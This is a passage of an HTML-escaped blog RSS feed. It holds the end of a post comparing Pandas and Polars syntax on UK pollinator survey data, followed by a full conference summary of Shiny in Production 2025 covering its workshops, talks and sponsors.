&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;agg(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_insects &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;taxon_standardised&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;len()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="pandas-3"&gt;Pandas 3&lt;/h3&gt;
&lt;p&gt;Pandas 3.0 is introducing a
&lt;a href="https://pandas.pydata.org/docs/dev/whatsnew/v3.0.0.html#pd-col-syntax-can-now-be-used-in-dataframe-assign-and-dataframe-loc" rel="external"&gt;new syntax&lt;/a&gt;
that can be used for filtering rows, or adding new columns.
It is closely related to the Polars &lt;code&gt;pl.col()&lt;/code&gt; syntax. For example, filtering to keep only the
&amp;ldquo;Hymenoptera&amp;rdquo; in the pollinators dataset can be performed using the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Pandas 3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pollinators &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#ff7b72;font-weight:bold"&gt;....&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pollinators&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The new part of this syntax is the use of &lt;code&gt;pd.col()&lt;/code&gt;, the &lt;code&gt;.loc[]&lt;/code&gt; method is actually available in
Pandas 2.0, where we use an anonymous function to select the required rows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Pandas 2 or 3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pollinators&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[&lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In this blog post we have shown the similarities and differences between Pandas and Polars syntax
for typical data-manipulation tasks. There are some fundamental differences between Pandas and
Polars that go deeper than the syntactic things covered here (and we&amp;rsquo;ve really only scratched the
surface of those differences). Polars is implemented in Rust, whereas Pandas is written in Python
on top of Numpy&amp;rsquo;s C++ code base. The speed of Polars and Pandas can differ on the same tasks as a
result of the different implementations. Processing speed is occasionally a good reason to choose
one package over another. But if you are considering migrating from Pandas to Polars, you have to
accept that your team will all need onboarding to the Polars syntax. From what we&amp;rsquo;ve seen here,
the contrast between Pandas and Polars syntax aren&amp;rsquo;t that great; the methods have similar names for
example. In fact, from discussing the two packages with data scientists, we have found that it is
the Polars syntax, rather than it&amp;rsquo;s speed, that has led some to migrate away from Pandas.&lt;/p&gt;
&lt;h2 id="data-citation"&gt;Data Citation&lt;/h2&gt;
&lt;p&gt;UK Pollinator Monitoring Scheme (2025). Pan trap survey data from the UK Pollinator Monitoring
Scheme, 2017-2022. NERC EDS Environmental Information Data Centre.
&lt;a href=""&gt;https://doi.org/10.5285/4a565007-d3a1-468d-9f84-70ec7594fafe&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The UK Pollinator Monitoring Scheme (UK PoMS) is a partnership funded jointly by the UK Centre for
Ecology &amp;amp; Hydrology (UKCEH) and Joint Nature Conservation Committee (JNCC) (through funding from the
Department for Environment, Food &amp;amp; Rural Affairs, Scottish Government, Welsh Government and
Department of Agriculture, Environment and Rural Affairs for Northern Ireland). UKCEH’s contribution
is part-funded by the Natural Environment Research Council formerly as part of the UK-SCAPE
programme (award NE/R016429/1) and now as part of the NC-UK programme (award NE/Y006208/1)
delivering National Capability. Between 2017 and 2021, PoMS was funded by UKCEH and Defra (England),
Welsh Government, Scottish Government, DAERA (Northern Ireland), and JNCC. PoMS is indebted to the
many volunteers who carry out surveys and contribute data to the scheme.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-df-syntax/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2025)</title><link>https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/</link><pubDate>Mon, 03 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This October, Jumping Rivers hosted the fourth installment of our conference &amp;ldquo;Shiny In Production&amp;rdquo;.
This year, speakers from around the world joined us in Newcastle to see how Shiny, in both Python
and R, has solved real data problems for them.&lt;/p&gt;
&lt;!-- TODO: Teaser re the new conference --&gt;
&lt;h2 id="workshops"&gt;Workshops&lt;/h2&gt;
&lt;p&gt;An important part of &amp;ldquo;Shiny In Production&amp;rdquo; is the afternoon of hands-on workshops.
Whether you want your app to look nice, behave correctly, or treat all your users fairly, there was
something for you. If only we could attend all of the workshops in parallel, too&amp;hellip;&lt;/p&gt;
&lt;h3 id="colin-fay---"&gt;Colin Fay - &lt;a href="https://connect.thinkr.fr/2025-shinyinprod-pw/" rel="external"&gt;&amp;ldquo;Production-Proof Shiny - End-to-end testing with Playwright and {golem}&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Colin Fay from &lt;a href="https://thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt; presented a workshop on the, now industry-standard
tool &amp;ldquo;Playwright&amp;rdquo;, for end-to-end testing. Playwright can be used against any browser-based
application, so by learning this tool our attendees could go away and test apps whether they are
written with Shiny in R or Python, or using any other dashboard framework.&lt;/p&gt;
&lt;h3 id="russ-hyde---asynchronous-shiny"&gt;Russ Hyde - &amp;ldquo;Asynchronous Shiny&amp;rdquo;&lt;/h3&gt;
&lt;!-- Russ apologises to the rest of JR for the following daftness --&gt;
&lt;p&gt;Poor Shiny.
13 years old is practically middle-aged for a web framework, and like many a tech wunderkind, it&amp;rsquo;s
decided that it&amp;rsquo;s time for a change.
Here at Jumping Rivers, we wish Shiny great success as it embarks on a new life as a chef.
But as it juggles the multiple orders that come in, and the many different recipes on the menu,
Chef Shiny has realised that its years training on the futures, promises, and ExtendedTasks of the
data world were the perfect apprenticeship for this brave leap.&lt;/p&gt;
&lt;p&gt;Russ, one of our Data Scientists from Jumping Rivers, explained to our workshop attendees how to
work with asynchronous programming in R. And how Shiny can make use of this approach to build apps
that can serve multiple users without blocking.&lt;/p&gt;
&lt;h3 id="pedro-silva---figma-and-user-interface-design"&gt;Pedro Silva - &amp;ldquo;Figma and User-Interface Design&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Yes Shiny, you &lt;em&gt;are&lt;/em&gt; beautiful, but are you really pairing that typeface with those buttons?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.figma.com/" rel="external"&gt;Figma&lt;/a&gt;, like Playwright above, is another widely-used tool from the wider
world of web development. It can be used to create user interface designs in collaboration with
clients and colleagues.&lt;/p&gt;
&lt;p&gt;Our Data Scientist Pedro Silva, ably-assisted by Tim Brock and Keith Newman, treated the workshop
attendees to an introductory session on Figma. They worked through hands-on exercises to design
components of an app and saw how thinking about the user-interface design from outside of your
normal IDE can help when you are building applications in Shiny.&lt;/p&gt;
&lt;h2 id="talks"&gt;Talks&lt;/h2&gt;
&lt;p&gt;On Day 2 we enjoyed talks from some fabulous speakers across a range of industries!&lt;/p&gt;
&lt;h3 id="colin-fay----1"&gt;Colin Fay - &lt;a href="https://speakerdeck.com/colinfay/after-shiny-the-future-of-mobile-apps-with-r" rel="external"&gt;&amp;ldquo;After {shiny} — Bringing R to Mobile with webR&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;R evolved from a command-line tool to include GUIs and IDEs. In 2012, Shiny emerged, enabling web app development purely in R, connecting statisticians with users.
However, mobile usage wasn&amp;rsquo;t prioritised initially.&lt;/p&gt;
&lt;p&gt;As mobile devices became ubiquitous, new requirements arose. Shiny&amp;rsquo;s mobile approaches proved limited, leading to the development of {shinymobile}.
Despite improvements, it still required internet connectivity, couldn&amp;rsquo;t be distributed through app stores, and lacked access to native phone APIs.&lt;/p&gt;
&lt;p&gt;To address these limitations, the team developed {R-linguo}, a proof-of-concept native app using webR. It offers offline functionality,
native performance, mobile-friendly UX, native API access, and app store distribution.&lt;/p&gt;
&lt;p&gt;The way the app works is by loading a JavaScript runtime, which loads webR, which then loads R functions as R object proxies that JavaScript can call.&lt;/p&gt;
&lt;p&gt;This innovation serves scientists in remote areas, students, and educators who need offline R capabilities beyond what Shiny apps can provide.&lt;/p&gt;
&lt;h3 id="charlie-gao---"&gt;Charlie Gao - &lt;a href="https://shikokuchuo.net/sip2025" rel="external"&gt;&amp;ldquo;Advances in the Shiny Ecosystem&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This talk explores two key advances in the Shiny ecosystem: async programming and OpenTelemetry tracing.&lt;/p&gt;
&lt;p&gt;The async section focuses on Promises and the mirai package. Mirai offers a modern foundation with NNG, IPC/TCP/secure TLS support, and cross-language
data formats like Arrow. It delivers extreme performance, scaling to millions of tasks, with a production-first approach featuring 100% reliable
evaluation and minimal complexity. It deploys everywhere, from local to remote systems and clusters including Slurm, SGE, LSF, and PBC.&lt;/p&gt;
&lt;p&gt;OpenTelemetry provides observability at scale through distributed tracing across services, databases, and API gateways. It enables performance
optimisation by reducing span length and nesting, real-time error detection, centralised monitoring across processes and machines, and production monitoring.
Implementation requires installing {otel} and {otelsdk} packages and configuring environment variables.&lt;/p&gt;
&lt;p&gt;The recommended performance workflow involves enabling OpenTelemetry to identify slow spans, using profvis for detailed analysis, then
optimising through moving work outside Shiny servers, improving code efficiency, implementing caching, and sometimes utilising non-blocking
reactivity.&lt;/p&gt;
&lt;h3 id="colin-gillespie---validating-shiny-apps-in-regulated-environments"&gt;Colin Gillespie - &amp;ldquo;Validating Shiny Apps in Regulated Environments&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Colin explored how to validate Shiny apps and what makes them trustworthy.
Using audience input, he concluded that professional Shiny apps need tests,
documentation, and a good user experience.&lt;/p&gt;
&lt;p&gt;He covered the Jumping Rivers &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt; suite,
which validates R packages,
and explained that Shiny apps are harder to validate due to user interaction and
variable outputs. Combining Litmus tools with Shiny-specific assessments can produce a validation score.&lt;/p&gt;
&lt;p&gt;Colin also covered challenges such as logging user actions, validating downloads,
and restricting inputs. He stressed using {renv} or Docker to manage environments,
performing end-to-end testing, and separating logic from the app for easier testing.
The talk ended with best practices around documentation, validation, workflows, and automation.&lt;/p&gt;
&lt;h3 id="jack-anderson---transforming-the-reporting-of-national-patient-outcomes-with-shiny"&gt;Jack Anderson - [&amp;ldquo;Transforming the reporting of national patient outcomes with Shiny&amp;rdquo;]&lt;/h3&gt;
&lt;p&gt;(&lt;a href="https://digital.nhs.uk/ndrs/data/data-outputs/cancer-data-hub/30-day-mortality-after-sact" rel="external"&gt;https://digital.nhs.uk/ndrs/data/data-outputs/cancer-data-hub/30-day-mortality-after-sact&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;The Shiny era may be in full swing, but our battle against inadequate Excel spreadsheets wages on.&lt;/p&gt;
&lt;p&gt;The National Disease Registration Service (NDRS) reports 30-day mortality post-Systemic Anti-Cancer Therapy (SACT) Case-Mix Adjusted Rates (CMAR) to NHS trusts in England each year.
For the first three years, these were shared as Excel files with an accompanying pair of instructions in PDF files.
But this leaves you with a number of problems, such as time-consuming admin to prepare and email the results to over 350 trusts around the country, and limited capacity for &lt;abbr title="quality assurance"&gt;QA&lt;/abbr&gt; checks.&lt;/p&gt;
&lt;p&gt;Replacing this system with a Shiny alternative provided a more intuitive user interface, plots that now make sense when copied into external reports, and the ability for trusts to easily compare against neighbouring regions.
Jack guides us through the many benefits&amp;mdash;not just for the end-user&amp;mdash;but also the &lt;abbr title="National Disease Registration Service"&gt;NDRS&lt;/abbr&gt; benefitting from drastically reduced admin requirements in publishing results each year.&lt;/p&gt;
&lt;p&gt;Spurred on from the success of this application, the &lt;abbr title="National Disease Registration Service"&gt;NDRS&lt;/abbr&gt; now has a custom Shiny starter template to support the creation of future Shiny applications among the team.&lt;/p&gt;
&lt;h3 id="gabriella-de-lima-marin---a-collaborative-initiative-for-mapping-and-georeferencing-public-schools-in-brazil"&gt;Gabriella De Lima Marin - [&amp;ldquo;A collaborative initiative for mapping and georeferencing public schools in Brazil&amp;rdquo;]&lt;/h3&gt;
&lt;p&gt;(&lt;a href="https://gabrielamarin.quarto.pub/shiny-in-production/" rel="external"&gt;https://gabrielamarin.quarto.pub/shiny-in-production/&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;With a goal of identifying digital inequality around Brazil, Gabriela lays out the problem of ensuring schools across Brazil can get a good connection to &lt;a href="https://medicoes.nic.br" rel="external"&gt;fibre internet networks&lt;/a&gt;.
But that can be difficult when 3 in every 10 schools on the list have no geolocation data.
It&amp;rsquo;s even worse when some schools with location data have coordinates that lie in the ocean.&lt;/p&gt;
&lt;p&gt;Pulling in data from other sources&amp;mdash;such as Google and OpenStreetMap&amp;mdash;can help,
but even these sources can be missing data or have incorrect entries.
So why not allow locals to provide the missing pieces of the puzzle?
Gabriela takes us through the creation of a &lt;a href="https://api.simet.nic.br/geo-escolas/" rel="external"&gt;Shiny application&lt;/a&gt; containing a {leaflet} map, where users can submit location data for schools.&lt;/p&gt;
&lt;p&gt;There are of course challenges which Gabriela had to face: How do you decide which data source to trust?
How do you decide who submitted the most accurate location marker?
Challenges aside, this remains a cost-effective way to collect the vital information from those with local knowledge.
And with this information, you can make impactful improvements to educational services across Brazil.&lt;/p&gt;
&lt;h3 id="cam-race---shinygovstyle-a-shiny-secret-weapon-for-production-ready-government-public-services"&gt;Cam Race - [&amp;ldquo;shinyGovstyle: A &amp;lsquo;Shiny&amp;rsquo; Secret Weapon for Production-Ready Government Public Services&amp;rdquo;]&lt;/h3&gt;
&lt;p&gt;(&lt;a href="https://drive.google.com/file/d/1hCbMEZjxq_hoSBWXomj9bw1p_WSQ9Nxx/view?usp=sharing" rel="external"&gt;https://drive.google.com/file/d/1hCbMEZjxq_hoSBWXomj9bw1p_WSQ9Nxx/view?usp=sharing&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;The vast majority of UK government service websites use the &lt;a href="https://design-system.service.gov.uk/" rel="external"&gt;GOV.UK Design System&lt;/a&gt;&amp;mdash;an &lt;a href="https://www.gov.uk/government/news/govuk-wins-design-of-the-year-2013" rel="external"&gt;award-winning&lt;/a&gt; framework for consistent styling and components on websites.&lt;/p&gt;
&lt;p&gt;Cam showcased {shinyGovstyle}, an R package that applies the &lt;a href="https://github.com/dfe-analytical-services/shinyGovstyle/" rel="external"&gt;GOV.UK design system&lt;/a&gt; on your Shiny app,
and explained the benefits of having a consistent theming package for your applications.
While the biggest effect from the package is to apply the standardised CSS to the application, additional functions are added to provide more accessible formats to hyperlinks and widgets.
This means some of the styling requirements needed to meet WCAG 2.2 AA are handled automatically, which is a legal requirement for UK government web services to meet.
But as Cam points out, while a surprisingly large percentage of users will have some form of accessibility needs, improved accessibility benefits everyone.&lt;/p&gt;
&lt;p&gt;Thanks to this common design system in a package, it&amp;rsquo;s much easier for developers to have their Shiny applications accepted for publication on government sites.&lt;/p&gt;
&lt;h3 id="laura-mawer---duck-duck--dashboardduck-duck-dashboard-videomp4"&gt;Laura Mawer - [&amp;ldquo;Duck, Duck, &amp;hellip;, Dashboard&amp;rdquo;](Duck, Duck,… Dashboard!​ video.mp4)&lt;/h3&gt;
&lt;!-- Russ to enter text --&gt;
&lt;p&gt;I write this while seeking cover. As Laura pelts another questioneer with rubber ducks, I&amp;rsquo;ll try to
summarise her talk&amp;hellip;&lt;/p&gt;
&lt;p&gt;The second Shiny app that Laura (from &lt;a href="https://datacove.co.uk/" rel="external"&gt;Datacove&lt;/a&gt;) ever built, shows off
some super cool stuff. Interactive graphics of duck-related data are one thing. But the artificial
intelligence embedded in this app was awesome.&lt;/p&gt;
&lt;p&gt;If you haven&amp;rsquo;t seen the
&lt;a href="https://shiny.posit.co/py/docs/genai-inspiration.html" rel="external"&gt;AI tutorials for &amp;ldquo;Shiny for Python&amp;rdquo;&lt;/a&gt;
that Posit have written, they are strongly recommended. But you need a good idea before including
AI in an app. Here, Laura included a text-query box that allows users to ask questions about the
dataset that is presented in the app. You can ask questions about ducks in general, or about the
dataset itself. The idea worked really well.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s right. Her second ever app&amp;hellip;&lt;/p&gt;
&lt;p&gt;If you are learning Data Science in Python, Laura hosts a YouTube series
&lt;a href="https://www.youtube.com/playlist?list=PLyRG_Y8ORUtf5IDO3RYDSHEvAtrhvAy06" rel="external"&gt;&amp;ldquo;Pretty Powerful Pandas&amp;rdquo;&lt;/a&gt;.
Hopefully she won&amp;rsquo;t be throwing pandas at us next time&amp;hellip;&lt;/p&gt;
&lt;h3 id="nic-crane--charlotte-hadley---htmlwidgets-are-a-secret-sauce-in-r---can-llms-make-them-the-perfect-condiment"&gt;Nic Crane &amp;amp; Charlotte Hadley - &amp;ldquo;htmlwidgets are a secret sauce in R - can LLMs make them the perfect condiment?&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;The final talk of the day was a duet. If you blend one htmlwidgets enthusiast, and one LLM
enthusiast, this interactive session is the result.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.htmlwidgets.org/" rel="external"&gt;{htmlwidgets}&lt;/a&gt; powers much of the connection between R and JavaScript
widgets. Think DT, leaflet, plotly and profvis: their use in R and Shiny is held together by
htmlwidgets. Many of the audience have made use of these tools at one time or another.
It&amp;rsquo;s much less common to meet someone who has created an htmlwidget-based package that wraps up
a JavaScript library for use in R.&lt;/p&gt;
&lt;p&gt;This talk by Nic and Charlotte, showed us how simple it is to make an htmlwidget.&lt;/p&gt;
&lt;p&gt;But it didn&amp;rsquo;t just do that. There&amp;rsquo;s already tutorials and books that can explain that process.
Here, they showed us how simple it is to get GitHub Co-pilot to make an htmlwidget. Using prompts
in VS-Code, they built an initial widget and then refined it and refined it with further prompting,
until the resulting R code could create a timeline from an input data-frame.&lt;/p&gt;
&lt;p&gt;Sure, there was a bit of manual tweaking required to polish off the code, but the package created
by Co-pilot was usable. So it still takes an expert like Nic or Charlotte to temper some of the
decisions made by code-generating tools.&lt;/p&gt;
&lt;h2 id="lightning-talks"&gt;Lightning Talks&lt;/h2&gt;
&lt;p&gt;Like last year the lightning talks had the added challenge of the slides auto-rolling with 10 seconds for each one!
We also had a vote for the best talk with the prize being a £100 book voucher donated by the CRC Press. David Carayon
from INRAE claimed the prize, avenging his second place finish last year!&lt;/p&gt;
&lt;h3 id="david-carayon---"&gt;David Carayon - &lt;a href="https://hal.inrae.fr/hal-05312032" rel="external"&gt;&amp;ldquo;Rescuelog: a Shiny-Based Monitoring System for Lifeguards: Insights from Southwest France&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;David started with showing the beautiful beaches of south west France with the caveat that they are some
of the most dangerous in the world with thousands of rescues per year. He then outlined his project equipping
life guards with tools and knowledge for reporting these rescues, allowing the collection of data to be
used in a predictive analytics Shiny app. The project has been a great success with over 15,000 submissions each
year and over 80 beaches signed up.&lt;/p&gt;
&lt;h3 id="rhian-davies---"&gt;Rhian Davies - &lt;a href="https://rhian.rbind.io/talks/2025-10-09-accidental-engineers/" rel="external"&gt;&amp;ldquo;The Accidental Engineers: Managing Shiny Apps, Pipelines, and Tech Debt in the NHS&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Rhian started with outlining the challenge of hospital planning, in terms variables impacting demand like
population growth, patient expectations or waiting lists. She then presented a project using Shiny to explore
outputs from a Python model.&lt;/p&gt;
&lt;p&gt;The struggle of losing a core member of the team and the app going into production. This resulted in
a huge surge in demand for the developers time with bugs, feature requests flying in. They have developed
a mechanism to treat the model like a software project with sprints including development, quality assurance and
launch. She finished with detailing some of the best practices they&amp;rsquo;ve implemented and important lessons learnt.&lt;/p&gt;
&lt;h3 id="andrie-de-vries---working-with-inforsec-to-get-to-production"&gt;Andrie de Vries - &amp;ldquo;Working with Inforsec to get to production&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Andrie spoke about the importance of the three pillars of Infosec: availability,
integrity and confidentiality. He also covered the risks of data leakage, not testing adequately and
exposure to the LLM provider. He moved on the some solutions to these problems like authorisation,
data security and scoped permissions.&lt;/p&gt;
&lt;h3 id="russ-hyde---discoverability-and-the-data-product"&gt;Russ Hyde - &amp;ldquo;Discoverability and the Data Product&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;This talk by our own Russ Hyde spoke about the importance of discoverability of tools and apps, this is often
an overlooked part of development. Moving on to Shiny apps specifically there is aspects of metadata you can
add like descriptions, tags and documentation.&lt;/p&gt;
&lt;p&gt;Russ spoke about helping users by making it easy to find and use products and contact developers. He pointed
to the Jumping Rivers &lt;a href="https://www.jumpingrivers.com/data-science/gallery/" rel="external"&gt;dashboard gallery&lt;/a&gt;, with some helpful examples of features you can include in Shiny
dashboards.&lt;/p&gt;
&lt;h3 id="kia-mack--euan-mckenzie---building-the-kent-bng-register-shiny-for-ui-first-development-in-a-small-charity-tech-team"&gt;Kia Mack &amp;amp; Euan McKenzie - &amp;ldquo;Building the Kent BNG Register: Shiny for UI-First Development in a Small Charity Tech Team&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Kia started off with a brief background on something called Biodiversity Net Gain, a government initiative where
land developers have to increase biodiversity and a popular way of doing this is by buying biodiversity credits.
The Kent Wildlife Trust wanted a way to add visibility to local habitat banks (where the credits can be purchased)
to ensure that local developers are investing in local biodiversity. She introduced the Shiny app that they had
designed for land developers to see what listings are available from habitat banks and enquire with them.&lt;/p&gt;
&lt;p&gt;Euan then detailed the tools used within the app like Bbs4Dash for the layout, leaflet for the open source maps
and DT for interactive tables. He also spoke about the auth0 package for in app authentication, with email verification.
Having a secure database was a key part of the project so they used the glue_sql and inputValidator functions
to prevent SQL injection by sanitising queries. The Golem framework was also very helpful for structuring the app
and allowed them to create a separate R package containing the business logic with tests.&lt;/p&gt;
&lt;h3 id="natalia-petersen---hackathon-to-streamline-the-national-disease-registration-service-cancer-treatments-shiny-appnhse-ndrsshiny-app-cancer-treatments-this-repository-is-for-the-production-of-the-ndrs-cancer-treatments-r-shiny-app"&gt;Natalia Petersen - [&amp;ldquo;Hackathon to Streamline the National Disease Registration Service Cancer Treatments Shiny App&amp;rdquo;](NHSE-NDRS/shiny-app-cancer-treatments: This repository is for the production of the NDRS Cancer Treatments R Shiny app)&lt;/h3&gt;
&lt;p&gt;Natalia from the National Disease Registration Service spoke about how her team used a hackathon day to
develop a shiny app. She started with a background of the project, a publicly available dashboard which
presents treatment data for various forms of cancer treatment. She displayed the previous iteration
of the dashboards (one for demographics and one for alliance) with a &amp;ldquo;retro&amp;rdquo; UI.&lt;/p&gt;
&lt;p&gt;She spoke about areas of improvement they targeted for the dashboards like combining the dashboards,
removing repeated code and simplification of over-complicated logic. They had 4 tasks, 4 hours and 4
analysts to tackle the issues. She spoke about successes of the session and also what could have improved
it, like dedicated &amp;ldquo;mop-up&amp;rdquo; time. To finish Natalia showed what the new app looked like and gave
an overview of the improvements made.&lt;/p&gt;
&lt;h3 id="andreas-wolfsbauer---enhancing-epidemiological-surveillance-with-a-shiny-application-for-standardized-data-analysis"&gt;Andreas Wolfsbauer - &amp;ldquo;Enhancing Epidemiological Surveillance with a Shiny Application for Standardized Data Analysis&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Andreas, a data scientist at the Austrian Agency for Health and Food Safety in the Institute for
Surveillance &amp;amp; Infectious Disease Epidemiology. He showed the Shiny application he has developed
for standardised data analysis. The app has two components, the first is a dashboard where users
can load the disease data then filter on year, state and age group. The second part of the app
is an analysis page where they can filter the data and download or visualise the data.&lt;/p&gt;
&lt;p&gt;Andreas spoke about issues with the app like a reliance on excel for the data so he
ran a scheduled job each morning to preload the data. He spoke about constraints within the organisation
with policies limiting access to tools like Docker and shinyproxy. So he turned to Shiny Server and
deployed 3 instances of the app and wrote a gateway app which handles load balancing across the
instances. He closed his talk with a list of features he would like to experiment with /
add to the app in the future.&lt;/p&gt;
&lt;h2 id="what-happens-next"&gt;What happens next?&lt;/h2&gt;
&lt;p&gt;Next year, we’re excited to host the very first &lt;strong&gt;AI In Production&lt;/strong&gt;!
Join us on June 4th and 5th in Newcastle Upon Tyne for an inspiring lineup of industry-leading
speakers and hands-on workshops. Grab your tickets now on
&lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869?aff=ebdssbcategorybrowse" rel="external"&gt;Eventbrite&lt;/a&gt;
to take advantage of the &lt;strong&gt;Super Early Bird&lt;/strong&gt; discount before it’s gone.&lt;/p&gt;
&lt;h2 id="sponsors"&gt;Sponsors&lt;/h2&gt;
&lt;!-- Posit --&gt;
&lt;a href="https://posit.co/"&gt;
&lt;img
src="posit-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="Posit logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- RSS --&gt;
&lt;a href="https://rss.org.uk/"&gt;
&lt;img
src="rss_logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="RSS logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- ThinkR --&gt;
&lt;a href="https://thinkr.fr/"&gt;
&lt;img
src="thinkr-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="Think-R logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- Datacove
TODO: Ask Tim how to include Datacove .avif --&gt;
&lt;a href="https://datacove.co.uk/"&gt;
&lt;img
src="datacove-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em"
alt="Datacove logo"
/&gt;
&lt;/a&gt;
&lt;br&gt;
&lt;!-- R Consortium --&gt;
&lt;a href="https://www.r-consortium.org/"&gt;
&lt;img
src="rconsortium-logo.png"
style="width: 285px; display: block; margin-left: auto; margin-right: auto"
